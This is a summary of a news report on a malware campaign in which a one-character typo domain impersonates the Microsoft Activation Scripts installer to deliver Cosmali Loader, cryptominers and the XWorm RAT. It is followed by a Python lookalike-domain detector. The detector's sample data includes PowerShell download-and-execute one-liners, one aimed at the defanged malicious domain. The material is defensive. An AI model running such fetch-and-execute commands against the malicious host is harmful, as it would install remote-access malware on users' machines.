Fake MAS Windows Activation Domain Spreads PowerShell Malware

December 25, 2025 Lisa Park Tech
Original source: bleepingcomputer.com

Summary of the Cosmali Loader Malware Campaign

This article details a recent malware campaign targeting users of the Microsoft Activation Scripts (MAS) project, an open-source tool for activating Windows and Office. Here’s a breakdown of the key information:

* The Scam: Attackers are exploiting a typo in the official MAS activation instructions. Users attempting to activate Windows via PowerShell are being tricked into mistyping “get.activated.win” as “get.activate[.]win”. This leads to infection with the Cosmali Loader malware.
* The Malware: Cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT). Critically, the malware’s control panel is insecure, meaning anyone can potentially access infected computers.
* The Warning: Users are receiving pop-up warnings claiming they are infected with Cosmali Loader. These warnings advise a complete Windows reinstall.
* Origin of Warnings: It’s believed a security researcher gained access to the malware’s control panel and used it to notify infected users.
* MAS Project: MAS is a legitimate, open-source project hosted on GitHub, but Microsoft views it unfavorably.
* How it Works: The attackers rely on the small difference between the legitimate and malicious domain names – a single character – hoping users will make a typo.

In short, users of the MAS project are being targeted by a sophisticated phishing campaign that leverages a simple typo to deliver malware. The recommended solution is a complete Windows reinstall.

Key Takeaways:

* Double-check URLs: Always carefully verify the URLs you are entering, especially when dealing with activation or software installation.
* Be wary of pop-up warnings: While the warnings in this case were legitimate, be cautious about acting on pop-up messages without verifying their source.
* Understand the risks of unofficial activation tools: Using tools like MAS, while convenient, carries inherent risks as they are not officially supported by Microsoft.
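
The single-character difference described under "How it Works" can be checked mechanically. The following is an added example, not code from the article or from the MAS project: it flags hostnames in command lines that are within a small edit distance of the legitimate host without being equal to it. The function names, the distance threshold of 2 and the sample lines are assumptions made for illustration.

```python
import re

LEGIT = "get.activated.win"  # legitimate MAS host named in the article

# Hostname-like tokens; "[.]" is accepted so defanged indicators also match.
HOST_RE = re.compile(r"[a-z0-9-]+(?:(?:\[\.\]|\.)[a-z0-9-]+)+", re.I)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, computed with two rolling rows."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # deletion
                           cur[j - 1] + 1,             # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def lookalike_hosts(line: str, legit: str = LEGIT, max_dist: int = 2):
    """Return (host, distance) for hosts close to, but not equal to, legit."""
    hits = []
    for raw in HOST_RE.findall(line):
        host = raw.replace("[.]", ".").lower()  # refang before comparing
        d = edit_distance(host, legit)
        if 0 < d <= max_dist:  # max_dist=2 is an assumed threshold
            hits.append((host, d))
    return hits


def scan(lines):
    """Return (line number, hits) for every line containing a lookalike."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := lookalike_hosts(line))]


# Constructed sample lines standing in for PowerShell command history.
SAMPLE = [
    "irm https://get.activated.win | iex",
    "irm https://get.activate[.]win | iex",
    "Invoke-WebRequest https://example.com/setup.ps1",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE):
        print(f"line {n}: lookalike of {LEGIT}: {hits}")
```

The same comparison can be run over exported PowerShell history or script block logs, and a hit on a host with distance 1 from the expected one is the case this campaign relies on.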
